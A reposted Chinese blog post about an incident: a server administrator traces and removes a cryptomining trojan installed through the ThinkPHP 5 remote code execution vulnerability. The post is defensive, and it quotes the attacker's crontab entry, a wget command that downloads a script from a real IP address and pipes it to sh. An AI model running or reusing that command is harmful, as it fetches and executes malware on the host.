PHP程序员小白到大牛集训(12期免息)
首页 >php框架 >ThinkPHP > 正文

挂马清除经历:处理一个利用thinkphp5远程代码执行漏洞挖矿的木马

转载2021-04-07 08:45:311976 + 加入Thinkphp讨论小组
下面由thinkphp教程栏目给大家介绍处理一个利用thinkphp5远程代码执行漏洞挖矿的木马的方法,希望对需要的朋友有所帮助!

php入门到就业线上直播课:进入学习
Apipost = Postman + Swagger + Mock + Jmeter 超好用的API调试工具:点击使用

记一次挂马清除经历:处理一个利用thinkphp5远程代码执行漏洞挖矿的木马

昨天发现 一台服务器突然慢了 top 显示 几个进程100%以上的cpu使用

执行命令为 :

/tmp/php  -s /tmp/p2.conf
登录后复制

基本可以确定是被挂马了

下一步确定来源

last 没有登陆记录

先干掉这几个进程,但是几分钟之后又出现了

先看看这个木马想干什么吧

netstat 看到 这个木马开启了一个端口和国外的某个ip建立了连接

但是tcpdump了一小会儿 没有发现任何数据传递

这他是想干啥?

继续查看日志吧

在cron日志中发现了www用户 有一个crontab定时操作 基本就是这个问题了

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1
登录后复制

顺着下载了几个问题,看了看 应该是个挖矿的木马程序

服务器上的www用户 是安装 lnmp 创建的,看了来源很可能就是web漏洞了。

再看/tmp下的php的权限 就是www的

查看 lnmp下几个站的日志 发现是利用 thinkphp 5最近爆出的远程代码执行漏洞

漏洞细节:https://nosec.org/home/detail/2050.html

修复一下问题解决

但是 这个站点是测试站点 端口监听的是 8083 ,难道现在黑客能开始嗅探非常规端口了?

来源:https://www.simapple.com/425.html

相关推荐:最新的10个thinkphp视频教程

以上就是挂马清除经历:处理一个利用thinkphp5远程代码执行漏洞挖矿的木马的详细内容,更多请关注php中文网其它相关文章!

声明:本文转载于:simapple,如有侵犯,请联系admin@php.cn删除

  • 相关标签:php linux
  • 程序员必备接口测试调试工具:点击使用

    Apipost = Postman + Swagger + Mock + Jmeter

    Api设计、调试、文档、自动化测试工具

    自己动手手写一个MVC框架(40节精讲/巨细/新人进阶必看):立即学习

    快速了解框架底层运行原理+提高自身开发逻辑+新人必学课程

    相关文章

    相关视频


    视频教程分类

    专题推荐

    官方公众号

    php中文网课程

    扫码关注官方公众号
    回复“phpcn01”领取php学习资料课程
    全套工具、电子书、脑图、内部课程等

    推荐视频教程

    开通VIP会员课 0元学

    热门推荐